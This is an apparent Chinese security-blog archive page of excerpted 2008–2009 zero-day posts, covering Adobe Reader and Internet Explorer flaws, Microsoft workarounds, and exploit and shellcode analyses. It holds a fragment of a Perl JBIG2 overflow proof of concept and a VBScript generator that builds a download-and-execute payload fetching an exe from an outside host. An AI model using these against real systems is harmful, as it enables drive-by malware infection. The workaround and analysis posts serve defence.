标签 ‘0day’ 下的日志

Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

my $size = “\x40\x00”;
my $factor = “ABCD”;
my $data = “A” x 8314;
阅读全文 »

Tags: , , ,

新的pdf 0day 在这里

来源:alert7

下面这个是老的。
http://insecureweb.com/%20/newish-web-based-pdf-attack-in-the-wild-with-real-exploit-code/

新的pdf 0day 在这里
http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
阅读全文 »

Tags: ,

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day 网马生成器

作者:lcx

‘code by lcx

On Error Resume Next
Exeurl = InputBox( “请输入exe的地址:”, “输入”, “http://www.haiyangtop.net/333.exe” )
url=”http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL=”&URLEncoding(Exeurl)&”&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload”
阅读全文 »

Tags: , , , ,

Microsoft 安全通报:4 种方法暂时屏蔽 IE 最新 0day

# 鬼仔:这几天一直没上网,所以也没更新,积累到今天。

来源:cnbeta

IE 最新 0day 波及了微软全线系统,目前暂时没有补丁。微软于近日发布了一份安全通报,指导您如何暂时屏蔽此漏洞。
漏洞出在 OLEDB32.dll 这个文件上。所以我们的目的就是屏蔽这个文件。对此,微软连出了4个杀手锏:

1. SACL 法(仅适用于 Vista)
[Unicode]
Unicode=yes
[Version]
signature=”$CHICAGO$”
Revision=1
[File Security]
“%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll”,2,”S:(ML;;NWNRNX;;;ME)”
阅读全文 »

Tags: ,

IE 0day漏洞的最新消息:所有版本的IE都受影响

作者:tombkeeper

微软更新了对这个漏洞的公告

December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds.
阅读全文 »

Tags: ,

IE7 0day漏洞分析

标 题: 【原创】IE7 0day漏洞分析
作 者: xee
时 间: 2008-12-11,15:06
链 接: http://bbs.pediy.com/showthread.php?t=78480

2008.12.9看到knownsec的安全公告,发现IE7的0day,所以我也凑凑热闹
from http://hi.baidu.com/vessial

说实话,不怎么会javascript,所以分析也挺费劲的,
但是大体知道是个怎么回事触发这个漏洞的了
阅读全文 »

Tags: ,

IE7 0DAY漏洞所用shellcode的分析

标 题: 【原创】IE7 0DAY漏洞所用shellcode的分析
作 者:轩辕小聪
时 间: 2008-12-11,20:37
链 接: http://bbs.pediy.com/showthread.php?t=78502

作者主页: http://hi.baidu.com/yicong2007
目 的: 纯属学习,请勿用于恶意用途

Platform: XP SP3

继上次flash漏洞所用shellcode的分析后,过了半年,IE7 0DAY又来了。于是我同样看了这个漏洞所用的shellcode。
阅读全文 »

Tags: , ,

IE那个漏洞最和谐的变通方法(workaround) -更新了Vista上具体的删除方法

作者:Sowhat

重要更新: 2008/12/13 23:07

Microsoft SWI今天给出了8个Workaround, 并且认为到目前为止最好的一个是:

Disable the “Row Position” functionality of OLEDB32.dll

具体搞法:

Delete the following Row Position registry subkey:
HKEY_CLASSES_ROOT\CLSID\{2048EEE6-7FA2-11D0-9E6A-00A0C9138C29}
阅读全文 »

Tags: , ,